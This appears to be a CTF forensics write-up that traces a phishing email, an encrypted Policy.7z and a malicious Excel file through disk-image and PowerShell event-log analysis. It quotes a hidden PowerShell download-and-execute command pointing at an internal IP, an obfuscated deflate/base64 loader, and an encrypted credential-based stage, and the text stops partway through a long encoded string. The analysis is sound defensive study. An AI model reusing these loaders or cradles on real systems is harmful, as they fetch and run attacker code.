# Forensics
| Category  | Challenge Name                         | Difficulty |
| --------- | -------------------------------------- | ---------- |
| Forensics | HiddenGem Mixtape 1: Initial Access    | Medium     |
| Forensics | HiddenGem Mixtape 2: Credential Access | Hard       |
| Forensics | HiddenGem Mixtape 3: The Ultimate Goal | Hard       |
| Forensics | Pretty Good Prank                      | Medium     |
| Forensics | 2-layer security                       | Medium     |
| Forensics | Stealth                                | Hard       |
## HiddenGem Mixtape 1: Initial Access
### Description:

### Solution:
+ The challenge gives us 3 files:

+ But for this challenge I only use the zip file, as note.txt says.
+ Extracting the zip yields a hard disk image => I used both FTK Imager and Autopsy to analyse it.
+ According to the challenge description, an employee opened an email that is suspected of carrying the payload used to attack the company's systems, but it was deleted right afterwards.
+ First I looked for the `history`-related files to see what had happened => but they had been wiped clean, so the only remaining hope was to find that eml @@.
+ Following the path `[root]C/Users/IEUser/Documents/Policy... .eml` I found the eml file that the employee opened.

+ The eml contains a base64-encoded txt/html body together with an attachment, `Policy.7z`.
+ Decoding that base64 gives the following text:
```
<div style="font-family: Arial; font-size: 14px;"><span style="line-height:1.5"><span>We have just completed the Security Baseline for employees and personal computers due to some information leaks, so it is necessary to update the company's information security policy.</span></span><div style="line-height:1.5"><br></div><div style="line-height:1.5"><span>In order to ensure the Company's internal information security, I request you to read and master the content of the policy</span></div><div style="line-height:1.5"><br></div><div style="line-height:1.5"><span>This is a confidential document, so it should be protected</span></div><span style="line-height:1.5"></span><span style="line-height:1.5">Password is Privacy4411@2023!!!</span><br></div><div style="font-family: Arial; font-size: 14px;"><br></div>
<div class="protonmail_signature_block" style="font-family: Arial; font-size: 14px;">
<div class="protonmail_signature_block-user protonmail_signature_block-empty">
</div>
<div class="protonmail_signature_block-proton">
Sent with <a target="_blank" href="https://proton.me/" rel="noopener noreferrer">Proton Mail</a> secure email.
</div>
</div>
```

+ Reading it, the password to open the 7z file is `Privacy4411@2023!!!`
+ Now the important thing is to find that 7z file.
+ I mounted the disk image with FTK and then loaded it into Autopsy for further analysis.

+ After finding `Policy.7z`, I unlocked it with the password found earlier and got an xlsx (Excel) file => I checked it on VirusTotal to see whether it is malicious.

+ In the Behavior tab I noticed this line:
```
C:\Windows\System32\cmd.exe CMD.EXE /c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"http://172.21.20.96/windowsupdate.ps1\");IEX $e
```
+ => The crux of the challenge is revealed in this PowerShell snippet.
+ To follow this lead we just need to search for the keyword `http://172.21.20.96/windowsupdate.ps1`, or recognise that it usually shows up in the event logs => mainly in `Microsoft-Windows-PowerShell%4Operational.evtx`.
+ Following the path `[root]/C/Windows/System32/winevt/logs` I extracted the suspicious evtx file.
+ In the events with ID == 4104, there is this PowerShell command:

```
Creating Scriptblock text (1 of 1):
& ( $sHEllid[1]+$sheLLiD[13]+'X')( NEW-obJEct Io.cOMPReSSiON.DEFlAteStrEAM( [SyStem.iO.mEMOrySTream] [SysteM.cOnVerT]::FRomBase64STRINg( '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' ) , [sySteM.IO.ComprESsiON.cOmpresSiONMODe]::dEcomPrEss)|fOReach-OBJECt{NEW-obJEct iO.sTReAMrEAder( $_ , [TExT.EncOdiNg]::AscIi)} | fOREacH-obJeCt{$_.reADToend( )})
ScriptBlock ID: c2b56881-f6ae-40c8-b424-d0ab849ad17e
Path:
```
+ Decoding that base64 and raw-inflating it, I got:

```
(New-OBJECT MAnAGeMent.AUtOmaTiON.PsCreDEntIAL ' ', ('76492d1116743f0423413b16050a5345MgB8AHUAQgAxAEsAZQBQAE8AUQA4AHQAVAB5ADEAcwBXAFYALwBVADcAUAAyAGcAPQA9AHwAMQAzADcAMwAwAGIAOQA2ADMANQAwAGYAOABlADUAOQAxAGEAMgA4ADAAOQAzAGQAMABjADYAZgA2ADQAOAAxAGYAZAA4AGUAMAA2ADIANABmADQAMgAzADMAYwAxAGQANgA4ADEANgAwADcANgA1AGYANgBjAGUAZQA1ADAAMwA4ADMAZQA5AGMAOQAzAGUAYgBhAGIANgA1ADEANQBjAGYAYwBiADIAOQA2ADcAYgA4AGEAZAA3AGYANABhAGYAYgA2ADgANQAyADkAOAA1ADUAYQA2ADkAMwAzADMANwBkADIAOQA1ADkAZgBhADkANAA1AGYANwA1ADIAZAA2AGMAMgBhADYANQBjADAAYwA4AGEAYQA0AGYAZQBiAGUAYgA2AGQAOQA4AGIAOAA1AGYAZAA1ADMANgBkADYANQBkADMAZQBiADAANQBjADkAMABmADMANQA0AGYAOQBiADMAMQA2ADkAOQAyADcAZgA2ADcAZgBiADAAYQAxAGYANAAzAGIAYQBjADQANwA2ADgAYwA4ADYAOAA2ADcAYwA2ADAAZABkADkAOQAwADAAYgAzADYAMgA2ADUAZQA0AGYANAA2AGEAYgAwAGMAOAAwADAANQA4ADkANQBlAGYAYwBhADkANAAwADEANgBkADgAMwAzAGEAYQBlADMAMgAxAGEAMQBiADAAMwAwADQANQA1ADQAYQAzADIAYwA4AGQAZQBkADUAZABlAGIAMwA2ADgAYgA4AGYANAAyADUAZAAxADIAOAA0AGYANwA2ADcAMABjADMAOAA1ADMAMwAyADkAZQA2AGEANwBmADAAZAA2ADUAMwBkADkAYgAzADcAMgA4ADEAZAA2AGIANwAwADUAYwA0ADMAYQAwAGUAZgA0ADYAZQBiADkAYgA5ADcANQA5ADkAYQA0ADEAMgBhADQAYQA4ADYAMQBhADIAYgA4ADcANwAzADIAMABjADIAMQA3ADgAYwA0ADIAYwA0ADYAZgAwAGIANQBmAGEAYQA3AGIANQBlADMANgAwAGEANwAwAGMAMgBlADgAYQA5ADAAYwBlADkAMgBjADgAMgA3ADIAMAA4ADMANwBiAGQANAA1AGYAOQBlADQANABkADkAMgBiADAAZQBiADgAYgA4ADQAZQA2AGQANgBlADAAYgA5ADcANQBhAGQAYQA2ADMAZgAwADcAMAA3ADcAYgA5AGYAYwAxADcANQBjADUANgAwAGMAZQA4ADYAZAA4ADkAZABhADgAOQA1AGQAMQA5AGEAMQAzADUANgAxADUAMAAyAGQANgA2AGMAZQBmAGQAYwBlADUAMABiADAAYQA5ADIAOABlADMAZABkAGUANAAzADIAZgAwAGEANgA3ADkANQA3ADYANgA3ADIAOQBjAGUANgBkADQAZAAwAGUAZAAwADgAZAA5ADQANgBlADYAMwAyADIANQAyADkANABmADgAYwA5ADkAMAA0AGQAZgBkADEAYwAxAGUAOQAxADcAZgAyAGMANQBkAGYAMwAzADMANgBlAGEAZgBmAGMANgBjAGMAZABkAGQAMAA5ADAAZQAzADQAZAAwADYAZAAyADUAMwA2AGMANgA2ADAANAAyADUANgA2ADUAYwA0ADQAZQAyADIAMgBmADAANQAyAGEAYwA5ADAAZAAzADYAZAAzAGYAYQA2AGEAOAA0ADIAOQAwADAAMQAwAGYAOQBhADAAMwBkAGYAMQBiAGMANgAwAGMAZAA4ADEANAA5AGEAMwAyAGQAOQBlADcANwBkADEAYQBiADUANQA0ADIAZABhADQANwBmADAAYQA2ADYAMA
AyADEANABmADAAMgAyAGEAMQAxAGQANgBjADgAOQA2ADYAYgA1AGQANQAwADIAMwBiADQANwAxADkAZgA5AGIANAA4AGQAYwAwADAANABiADIANgA2ADEAMwAwADIAYQA1ADIAOQA2ADgAOQBmADgANgAwAGUAYwAyAGUANwAyAGUANAA1AGEAZABhAGEAMgA5ADQAZQAxAGUAMgA0ADcAMQAzAGYANAAyADMAYQAzAGMAZgBlAGEANQA0ADQAYQBmADEAZAA1AGYANQBiADQANQA2ADgAZQBhAGYAZQA4ADYAYgBhADgAMgBjADAAZQBjADIAMQAyADQAMgAyADAANAA4ADAAMAAyAGIAMgBiAGQANwBjAGYAYQA3ADIAMABhAGMANgA1AGYAZgA4ADcAZQA2ADcANwA5AGQAMAA2AGEANgBlADkAZgA1AGIAOQA0AGEAMwBiADAANgA4ADMAZAAwADQANQBkAGIAYwBmAGEANwBiADkAMAA1ADgAMABiAGYAYgA1AGEAMgAxAGUAMQA0ADgANgAzADgAYQAwADcANQBlADUAYgA5AGUAYgAxADQANQA2AGQAYgAzADEAZgA0AGQAZQBiADMAZABlADIANQBiAGYANgA5AGUANQA5ADYAYgA4AGEAMgBjADcAYgA5ADUAOAAxAGMAZQAwADcAZAAzADQAMwA0ADIAMwA5ADMAYQAyADUAMQBkADUAYgBlADQANABmADgAMgBiADYAMgA3ADgAYgAxAGMAMQBhAGMANQAyAGQANgBlADcANAA1AGYANAA5ADMAMAA5ADcANwBkAGIAMwA0AGUAYQBjADEANwAwAGUAZQBhADEAZQAzADUAZAA0ADIAYQBjADAAMQA2ADYAOABlADQAMAAxADcANwA4AGUAZABjADgAZAA5AGIAZQA0ADcANgBmADAANwBiADgAOAA4ADIAYgA4AGIAYwA2ADgAZQA3ADgAYQA2AGQAMwAzAGMAZQBlAGUANQAzADIAZQBkAGMAYQBhADkANwBhAGEAOAAwADEAZgA0ADEAMwAxADAAYwA2AGEAZgBmAGMAZgBlADEAYQA5ADcAOAAxADEAOQAwADEAYwBkADIAOQAwAGYANgBhADkAYwBlAGQAYQBmADYAYwBmADYAOAA1ADMAMAAxADQANgA2ADUAZABhADMAYgAwADEAZQAwADgAMwAxADMAMgA5ADYAOQA1AGYANAAwADgAOABjAGYANABmAGEAMgAxADQAZQA3ADUAMgA2ADQAOABhAGMAYgBlADAAYgA2ADcAYwAyAGMAOQA0AGIAMwBlAGIANAAxADkAMwAyAGIAZQBhADMANQA4AGUAOQBkAGQANQA3AGUAYgAyADcAZABmADQAZQBiADQAOQBmADQAMAA5AGEAOABhADYAOABhAGIAZQBlADAAYQA2ADUAZgA3ADEANQBkADIANABiADcAYwAxAGIANQAwADgAZQBlAGUAMQBjAGEANAA1ADYAMgBiAGYAMwA4ADAAMwBiADIAZgAwADAAYQAxADEAOAAwADQAYgA3ADcAMwBhADEANABkAGQANQA1ADQAZgA1AGMAMAA5ADQAOQA0ADAAZgA3AGIAMwA3AGIAMwAxADAAZQBjADQAYQA3ADYAMQBkADQAOQA3AGEAOABiAGYAZgBhAGMAZQAyADAAMgA3ADIAOQAxADIAZgBhADQAYwBhADkAYwA4ADAANwA0ADUANwAyADgAZQAzADUAMQBlADIAMgA1ADYAMAAwADAAOAAyAGIAYQA4AGYAZQBiAGEAMAA3AGYAMgBjAGIANgBkAGMAZgAxAGIAYgA4ADEAMgA4ADAANQA3ADMANAA3ADcAOQA5AGUANQA2ADUAMQAwAGQANAA1AGYANQAyAGQAYwBiADUAZgAzADgAMABmADIANwAxAGMAZQBhAGYAOABiADUANQBiAGQAZgBkAGMAMABjAGIANwBjADAANAA5AGYAZA
BkADAAMgAwADAAYwA5ADcAYwA3ADQANwBkADQAYgAwAGYAZABkAGYAMwAzADUAZQAwADgAZAAyADIAYQA4ADQAOQBlADgAZgBjAGMAMgAzADcANAAyADcAZgBhADMAZgA4ADUAMgBhADAANQAxADkAYgAyAGQAYwBjADQAOQA1ADUANwAwADUAYgA0ADgAOQBkADEAYwAzADgAMAA3ADUAOAA5AGEAYQBiADYAZQA5ADEAYQAxADMAMgBkADYAZAA5ADYAMQAzAGQAZAA2AGYANQAyAGQANgA1ADIAMAA5ADUAYgA2AGEAZQBjADkAMQBhAGIANQAyADUAMwA5ADQAMAAyADUAOQA0ADgAZgBmADgANAAwADYAMwBmAGIAMAA4AGQAZgA0ADUAYwAyAGQAOQAwADYANgA5ADkAOABiAGYANAA1ADYAMQAyADUANQA1ADAAYwAzADUAYgAwAGQAMgA0ADUAZAA0AGUAYwAyAGYAMABkADAAOAA1ADgAYgA0ADcANAA1ADIAMAAwADIANwBlADYAYgA2ADUAOABlADMAYgA3ADYAYgBmAGQANQA2ADYAZAAyADYAYwA4ADcANQAzADcAOABjAGMAMQBlADQANABmAGUAOQBhADUAYQBlADkAZABkAGMANQA2ADAAMQBmADYAMAAxADEAOQA3AGIAYwBiAGUANwA2ADIAZAA4ADkAYQA4AGEAMgBlAGQAMgA4ADQANAA4ADcANAA4AGEAYgA0AGIAMgA5ADgAOQBhAGUAMQAzADUAMwBkADMAMAA5ADMANQA1ADMAMQAyADEAYQBhADkAOAA2ADgAOQBlAGEANwA2ADIANAA3ADgAOQAzAGEAYwA0ADkAYgBhAGMAMwBmAGQAZABiADYAZgA3ADAAZABkADIAMQA3ADAAYQA4ADQAOQBlADYANgAxADkAYQA3ADMAMgA0ADgAOQA2ADcAOQBkADEAYQBmAGYANwAzADcAYgA0ADAANgAzADgAZAA1AGYAZgBkADgAOQBjAGIAZgA4ADYAOAAwADcAOQBkADYAMAAxADYAMgBmADcANAAwAGUAOAA4ADYANQAzAGYAMwA5ADMAZQAxADYAMgBmADIAZABjAGEAMAA3ADIAMAA1AGQAYQA5AGYAOABkADMAZAA2AGYAMgAxAGQAYwA0ADAAMgAwADMANQA4AGUAYQBiADYAMQBlAGQAMAA3ADcAYQBlADgAOQBiADEANQA1ADQAZAA1ADgAMQA3ADQAMwBjAGYANQAxAGUAMQAyAGIAZQBjADIAYgBmADIAZgBlADUANAA3ADQAYQA5ADAANwBjADQANgA0AGEAYQAwADMAZAA0AGEAZQA1AGMAZgAzAGMAYgBlAGEAZQA2ADQAMABiADQAMQBhAGEAZQA5ADcAYwAxADAAZQBiADYAMQAyAGMANQAwADUAMQBiAGQAMQBkADUANAAwADQAZQA1AGMANQAzAGUAOAA3ADYAYwA3AGUANwBjADQAZgAzAGMANwAyADgANwA1ADQAOQBhADIAMwA1ADUAMgA2ADAANgA1ADYANwAwADcAMgBiAGUAYwA0ADYAOQA5ADQANgA5AGUAYgA0ADQAMQBjADUAYwA4AGQAMgBjAGIAYQAxADIAMwA3ADYAYQBlAGUAZgA0ADIANgBlAGMAZgA0AGIANQA3ADcAOAAyAGEAYwA2ADMAZQBiADcANgAxADgANABiADcAMgA5ADAAMgA2ADkAZgBlAGEANQBjADgAZgA4AGEAYwBjAGIAMgBkAGYANAA4AGQAOABmADkANgBjAGIAOQA4AGUAOQBjAGMAMwA3ADcAYwAyAGQAZQA2ADQAMwBkADYAMQA5AGIANwAyADYAZQA5ADcAYQA5ADQANQBkADEANgA0AGQANAA2AGQAZQBlADAAZgBlADUAMAAzADkAYwBlAGYAZgBhADQANwA1AGEAMQBkADMAOAA1ADkAMAA1AGIAMAAyADIAMQ
A1ADEAOQA2AGUAYgA0AGUAOAA1ADYAYgA4ADEAMAA1ADAAYQBlAGUAMgBlADYAYwBkAGEANQBiAGUANwAzADMAZAA1ADAAZgBjADYAMwA5AGEANABlADEAMABmADUAMwA2ADgANQBjADUAYgA5AGIAYQA3AGEAMwA1ADkANgBlADAAMgBiADYAZQA5AGEANgA0ADAAMAA0ADYAOABkAGMAMQAwADIAYwAzADgAOAAzAGIAMQBiADgAZgA1ADUAYQBmADIAZgBkAGMANAAzAGIANgA4AGUAOQBiADgANQBmADIAMAA5AGMAZAA1ADUAYgAyAGMAMwA4AGEAZABiADgAOAAwAGYANQBkADQAZgAzADkAYgA4AGYAOAA3ADIAYwAwAGUAMgAyADYAZgAzADUAOQAzADgANQA3ADYAYwAyADAANQBlADEANwBlADEAZgBjADQAOAAwAGUAZQAyADIANABhADUANwA4ADQAMwBiADIAZAA3ADYAYQBkADUANABhAGIAMwA1ADgANgA1AGYAYwAzAGEAYwA1ADAAMQA2ADgAZABlADMAYQA1AGEANwAxADQAMgBkAGQAZQA4AGMANwA5ADcAYgAzADUANwA3AGYAMgA5ADYAMgBlADcAOQA3AGUAYgBmAGUAMgBiAGIAMwA0ADkAOQAyADcAMwBlADgAZQBmADMAOAAxADUAMwA1ADcANABiADMAMABmADkAMgA3AGMAOAA5AGMANABlAGQAZQA3AGIAYQA2AGYANABkADAAMgBiADYAMgAyADQAZABlAGYANwBhADQAMAAxADMAYgBjADMAYwBjADkAZQBhADcANgBhADMAOAA0AGYAMwAwAGYAOQBmADUAOABlADgAZAAwADgANAAzADAANABlAGEAMwAyAGMAZAAzADgAYgA2ADUAMgBmAGQAMwBjADgANwBhADkAMwAxAGUAMABiADQAMwAzAGIAOAA1AGUAMwAzADEAYgBlAGMAMQBiAGYAYgBmAGIANAAzAGUANwBjAGMAMwAxADMAYwAwAGYAMQBlADAAZgBmAGEAOAAyADEANgA4ADgAMwA3ADMANgA5AGQAMgA2AGEAZAA1ADYAYwBmAGYANgAxADAAOAA3AGQAMwAyADYAMQBlADgAMgAzAGMAOAAxADkAMwBhADYANwA3ADcAYQA3ADMAYgAwAGMAMAA2AGEANwBiAGMAZABmADIAZQBjADUAYwAxADYAMABhAGUANQBlADAAZgA2ADMAOAA3ADEANgA0ADEAOAA1ADUAMgAzADUAYQA5ADMANQA0AGMAOABiADAAMgAwAGQAMgAyAGIANQBmADQAOQBhADQAYQAwADMAZAAxADkAMwAyADQAYgBkADUAMwAzADAANAAxADMAMwAxAGYANwAzADYAMgA1AGYAYwBhAGIAMQA2ADYANgBjAGQANgAwAGIANABkADYAOABhAGQAMQAzADEAMAA4AGYAYwBhAGUAOAA0ADYAYQAyAGMAOAA1AGUAMQA3ADgAOABiAGYANwBjAGMAZQAyADcAZgA1ADAAZQBiAGQAYQAwAGQAOAAyADQANABjADIAYQA4ADMAYQBkADIAOAAxAGUANgBiADMANABlADMAZABiADMAMQA1ADcANABjADEAZQBjAGUAZAAyAGIAMgA4ADEAYwBiADgAMgAwAGEAZgAzADUANgAyAGYAMwA3ADIANABmADkAOAA5ADcANwBiADUANQAzAGYAMgA=' |ConvERTtO-SecureSTRiNG -k 55,113,158,254,51,94,175,13,94,42,226,159,63,7,144,195,14,139,39,217,58,39,188,60,182,192,74,94,209,172,100,93)).GetneTwoRKCrEDEnTIAl().pASsWoRD |. ( $PsHoME[21]+$psHOme[34]+'x')
```
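The base64 + raw-inflate step above can be automated for any 4104 ScriptBlock event that uses the same `FromBase64String` + `DeflateStream` loader. This is an added example, not part of the writeup; the sample event below is constructed around a harmless inner script, and `extract_inner_script` / `deflate_b64` are names chosen here.

```python
import base64
import re
import zlib
from typing import Optional

# The loader shape seen in the 4104 event: a base64 literal handed to FromBase64String,
# wrapped in a DeflateStream (raw DEFLATE, no zlib header), then read back as ASCII.
# The prefix `$ShellId[1]+$ShellId[13]+'X'` spells "ieX" from "Microsoft.PowerShell".
B64_LITERAL = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)", re.IGNORECASE)


def inflate_scriptblock(b64_literal: str) -> str:
    """base64 -> raw DEFLATE inflate -> ASCII, mirroring the loader's own pipeline."""
    compressed = base64.b64decode(b64_literal)
    # wbits=-15 selects raw DEFLATE, which is what System.IO.Compression.DeflateStream emits
    return zlib.decompress(compressed, -15).decode("ascii")


def extract_inner_script(scriptblock_text: str) -> Optional[str]:
    """Pull the base64 literal out of the logged ScriptBlock text and decode it."""
    m = B64_LITERAL.search(scriptblock_text)
    if not m:
        return None
    return inflate_scriptblock(m.group(1))


def deflate_b64(script: str) -> str:
    """Build a loader-style payload; used only to construct the sample event below."""
    c = zlib.compressobj(level=9, wbits=-15)
    data = c.compress(script.encode("ascii")) + c.flush()
    return base64.b64encode(data).decode("ascii")


# Constructed sample: a harmless inner script wrapped in the same loader text as the event.
SAMPLE_INNER = "Write-Output 'constructed sample, not the real payload'"
SAMPLE_EVENT = (
    "Creating Scriptblock text (1 of 1):\n"
    "& ( $sHEllid[1]+$sheLLiD[13]+'X')( NEW-obJEct Io.cOMPReSSiON.DEFlAteStrEAM( "
    "[SyStem.iO.mEMOrySTream] [SysteM.cOnVerT]::FRomBase64STRINg( '"
    + deflate_b64(SAMPLE_INNER)
    + "' ) , [sySteM.IO.ComprESsiON.cOmpresSiONMODe]::dEcomPrEss)"
    "|fOReach-OBJECt{NEW-obJEct iO.sTReAMrEAder( $_ , [TExT.EncOdiNg]::AscIi)})\n"
    "ScriptBlock ID: 00000000-0000-0000-0000-000000000000\n"
)

if __name__ == "__main__":
    print(extract_inner_script(SAMPLE_EVENT))
```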
+ Method 1:
+ At this point, after a bit of analysis (with help from ChatGPT), I recognised that `$PsHoME[21]+$psHOme[34]+'x'` <=> `echo` => we only need to drop the `|. ( $PsHoME[21]+$psHOme[34]+'x')` part and put echo at the start of the command.
```
echo (New-OBJECT MAnAGeMent.AUtOmaTiON.PsCreDEntIAL ' ', ('76492d1116743f0423413b16050a5345MgB8AHUAQgAxAEsAZQBQAE8AUQA4AHQAVAB5ADEAcwBXAFYALwBVADcAUAAyAGcAPQA9AHwAMQAzADcAMwAwAGIAOQA2ADMANQAwAGYAOABlADUAOQAxAGEAMgA4ADAAOQAzAGQAMABjADYAZgA2ADQAOAAxAGYAZAA4AGUAMAA2ADIANABmADQAMgAzADMAYwAxAGQANgA4ADEANgAwADcANgA1AGYANgBjAGUAZQA1ADAAMwA4ADMAZQA5AGMAOQAzAGUAYgBhAGIANgA1ADEANQBjAGYAYwBiADIAOQA2ADcAYgA4AGEAZAA3AGYANABhAGYAYgA2ADgANQAyADkAOAA1ADUAYQA2ADkAMwAzADMANwBkADIAOQA1ADkAZgBhADkANAA1AGYANwA1ADIAZAA2AGMAMgBhADYANQBjADAAYwA4AGEAYQA0AGYAZQBiAGUAYgA2AGQAOQA4AGIAOAA1AGYAZAA1ADMANgBkADYANQBkADMAZQBiADAANQBjADkAMABmADMANQA0AGYAOQBiADMAMQA2ADkAOQAyADcAZgA2ADcAZgBiADAAYQAxAGYANAAzAGIAYQBjADQANwA2ADgAYwA4ADYAOAA2ADcAYwA2ADAAZABkADkAOQAwADAAYgAzADYAMgA2ADUAZQA0AGYANAA2AGEAYgAwAGMAOAAwADAANQA4ADkANQBlAGYAYwBhADkANAAwADEANgBkADgAMwAzAGEAYQBlADMAMgAxAGEAMQBiADAAMwAwADQANQA1ADQAYQAzADIAYwA4AGQAZQBkADUAZABlAGIAMwA2ADgAYgA4AGYANAAyADUAZAAxADIAOAA0AGYANwA2ADcAMABjADMAOAA1ADMAMwAyADkAZQA2AGEANwBmADAAZAA2ADUAMwBkADkAYgAzADcAMgA4ADEAZAA2AGIANwAwADUAYwA0ADMAYQAwAGUAZgA0ADYAZQBiADkAYgA5ADcANQA5ADkAYQA0ADEAMgBhADQAYQA4ADYAMQBhADIAYgA4ADcANwAzADIAMABjADIAMQA3ADgAYwA0ADIAYwA0ADYAZgAwAGIANQBmAGEAYQA3AGIANQBlADMANgAwAGEANwAwAGMAMgBlADgAYQA5ADAAYwBlADkAMgBjADgAMgA3ADIAMAA4ADMANwBiAGQANAA1AGYAOQBlADQANABkADkAMgBiADAAZQBiADgAYgA4ADQAZQA2AGQANgBlADAAYgA5ADcANQBhAGQAYQA2ADMAZgAwADcAMAA3ADcAYgA5AGYAYwAxADcANQBjADUANgAwAGMAZQA4ADYAZAA4ADkAZABhADgAOQA1AGQAMQA5AGEAMQAzADUANgAxADUAMAAyAGQANgA2AGMAZQBmAGQAYwBlADUAMABiADAAYQA5ADIAOABlADMAZABkAGUANAAzADIAZgAwAGEANgA3ADkANQA3ADYANgA3ADIAOQBjAGUANgBkADQAZAAwAGUAZAAwADgAZAA5ADQANgBlADYAMwAyADIANQAyADkANABmADgAYwA5ADkAMAA0AGQAZgBkADEAYwAxAGUAOQAxADcAZgAyAGMANQBkAGYAMwAzADMANgBlAGEAZgBmAGMANgBjAGMAZABkAGQAMAA5ADAAZQAzADQAZAAwADYAZAAyADUAMwA2AGMANgA2ADAANAAyADUANgA2ADUAYwA0ADQAZQAyADIAMgBmADAANQAyAGEAYwA5ADAAZAAzADYAZAAzAGYAYQA2AGEAOAA0ADIAOQAwADAAMQAwAGYAOQBhADAAMwBkAGYAMQBiAGMANgAwAGMAZAA4ADEANAA5AGEAMwAyAGQAOQBlADcANwBkADEAYQBiADUANQA0ADIAZABhADQANwBmADAAYQA2A
DYAMAAyADEANABmADAAMgAyAGEAMQAxAGQANgBjADgAOQA2ADYAYgA1AGQANQAwADIAMwBiADQANwAxADkAZgA5AGIANAA4AGQAYwAwADAANABiADIANgA2ADEAMwAwADIAYQA1ADIAOQA2ADgAOQBmADgANgAwAGUAYwAyAGUANwAyAGUANAA1AGEAZABhAGEAMgA5ADQAZQAxAGUAMgA0ADcAMQAzAGYANAAyADMAYQAzAGMAZgBlAGEANQA0ADQAYQBmADEAZAA1AGYANQBiADQANQA2ADgAZQBhAGYAZQA4ADYAYgBhADgAMgBjADAAZQBjADIAMQAyADQAMgAyADAANAA4ADAAMAAyAGIAMgBiAGQANwBjAGYAYQA3ADIAMABhAGMANgA1AGYAZgA4ADcAZQA2ADcANwA5AGQAMAA2AGEANgBlADkAZgA1AGIAOQA0AGEAMwBiADAANgA4ADMAZAAwADQANQBkAGIAYwBmAGEANwBiADkAMAA1ADgAMABiAGYAYgA1AGEAMgAxAGUAMQA0ADgANgAzADgAYQAwADcANQBlADUAYgA5AGUAYgAxADQANQA2AGQAYgAzADEAZgA0AGQAZQBiADMAZABlADIANQBiAGYANgA5AGUANQA5ADYAYgA4AGEAMgBjADcAYgA5ADUAOAAxAGMAZQAwADcAZAAzADQAMwA0ADIAMwA5ADMAYQAyADUAMQBkADUAYgBlADQANABmADgAMgBiADYAMgA3ADgAYgAxAGMAMQBhAGMANQAyAGQANgBlADcANAA1AGYANAA5ADMAMAA5ADcANwBkAGIAMwA0AGUAYQBjADEANwAwAGUAZQBhADEAZQAzADUAZAA0ADIAYQBjADAAMQA2ADYAOABlADQAMAAxADcANwA4AGUAZABjADgAZAA5AGIAZQA0ADcANgBmADAANwBiADgAOAA4ADIAYgA4AGIAYwA2ADgAZQA3ADgAYQA2AGQAMwAzAGMAZQBlAGUANQAzADIAZQBkAGMAYQBhADkANwBhAGEAOAAwADEAZgA0ADEAMwAxADAAYwA2AGEAZgBmAGMAZgBlADEAYQA5ADcAOAAxADEAOQAwADEAYwBkADIAOQAwAGYANgBhADkAYwBlAGQAYQBmADYAYwBmADYAOAA1ADMAMAAxADQANgA2ADUAZABhADMAYgAwADEAZQAwADgAMwAxADMAMgA5ADYAOQA1AGYANAAwADgAOABjAGYANABmAGEAMgAxADQAZQA3ADUAMgA2ADQAOABhAGMAYgBlADAAYgA2ADcAYwAyAGMAOQA0AGIAMwBlAGIANAAxADkAMwAyAGIAZQBhADMANQA4AGUAOQBkAGQANQA3AGUAYgAyADcAZABmADQAZQBiADQAOQBmADQAMAA5AGEAOABhADYAOABhAGIAZQBlADAAYQA2ADUAZgA3ADEANQBkADIANABiADcAYwAxAGIANQAwADgAZQBlAGUAMQBjAGEANAA1ADYAMgBiAGYAMwA4ADAAMwBiADIAZgAwADAAYQAxADEAOAAwADQAYgA3ADcAMwBhADEANABkAGQANQA1ADQAZgA1AGMAMAA5ADQAOQA0ADAAZgA3AGIAMwA3AGIAMwAxADAAZQBjADQAYQA3ADYAMQBkADQAOQA3AGEAOABiAGYAZgBhAGMAZQAyADAAMgA3ADIAOQAxADIAZgBhADQAYwBhADkAYwA4ADAANwA0ADUANwAyADgAZQAzADUAMQBlADIAMgA1ADYAMAAwADAAOAAyAGIAYQA4AGYAZQBiAGEAMAA3AGYAMgBjAGIANgBkAGMAZgAxAGIAYgA4ADEAMgA4ADAANQA3ADMANAA3ADcAOQA5AGUANQA2ADUAMQAwAGQANAA1AGYANQAyAGQAYwBiADUAZgAzADgAMABmADIANwAxAGMAZQBhAGYAOABiADUANQBiAGQAZgBkAGMAMABjAGIANwBjADAANAA5A
GYAZABkADAAMgAwADAAYwA5ADcAYwA3ADQANwBkADQAYgAwAGYAZABkAGYAMwAzADUAZQAwADgAZAAyADIAYQA4ADQAOQBlADgAZgBjAGMAMgAzADcANAAyADcAZgBhADMAZgA4ADUAMgBhADAANQAxADkAYgAyAGQAYwBjADQAOQA1ADUANwAwADUAYgA0ADgAOQBkADEAYwAzADgAMAA3ADUAOAA5AGEAYQBiADYAZQA5ADEAYQAxADMAMgBkADYAZAA5ADYAMQAzAGQAZAA2AGYANQAyAGQANgA1ADIAMAA5ADUAYgA2AGEAZQBjADkAMQBhAGIANQAyADUAMwA5ADQAMAAyADUAOQA0ADgAZgBmADgANAAwADYAMwBmAGIAMAA4AGQAZgA0ADUAYwAyAGQAOQAwADYANgA5ADkAOABiAGYANAA1ADYAMQAyADUANQA1ADAAYwAzADUAYgAwAGQAMgA0ADUAZAA0AGUAYwAyAGYAMABkADAAOAA1ADgAYgA0ADcANAA1ADIAMAAwADIANwBlADYAYgA2ADUAOABlADMAYgA3ADYAYgBmAGQANQA2ADYAZAAyADYAYwA4ADcANQAzADcAOABjAGMAMQBlADQANABmAGUAOQBhADUAYQBlADkAZABkAGMANQA2ADAAMQBmADYAMAAxADEAOQA3AGIAYwBiAGUANwA2ADIAZAA4ADkAYQA4AGEAMgBlAGQAMgA4ADQANAA4ADcANAA4AGEAYgA0AGIAMgA5ADgAOQBhAGUAMQAzADUAMwBkADMAMAA5ADMANQA1ADMAMQAyADEAYQBhADkAOAA2ADgAOQBlAGEANwA2ADIANAA3ADgAOQAzAGEAYwA0ADkAYgBhAGMAMwBmAGQAZABiADYAZgA3ADAAZABkADIAMQA3ADAAYQA4ADQAOQBlADYANgAxADkAYQA3ADMAMgA0ADgAOQA2ADcAOQBkADEAYQBmAGYANwAzADcAYgA0ADAANgAzADgAZAA1AGYAZgBkADgAOQBjAGIAZgA4ADYAOAAwADcAOQBkADYAMAAxADYAMgBmADcANAAwAGUAOAA4ADYANQAzAGYAMwA5ADMAZQAxADYAMgBmADIAZABjAGEAMAA3ADIAMAA1AGQAYQA5AGYAOABkADMAZAA2AGYAMgAxAGQAYwA0ADAAMgAwADMANQA4AGUAYQBiADYAMQBlAGQAMAA3ADcAYQBlADgAOQBiADEANQA1ADQAZAA1ADgAMQA3ADQAMwBjAGYANQAxAGUAMQAyAGIAZQBjADIAYgBmADIAZgBlADUANAA3ADQAYQA5ADAANwBjADQANgA0AGEAYQAwADMAZAA0AGEAZQA1AGMAZgAzAGMAYgBl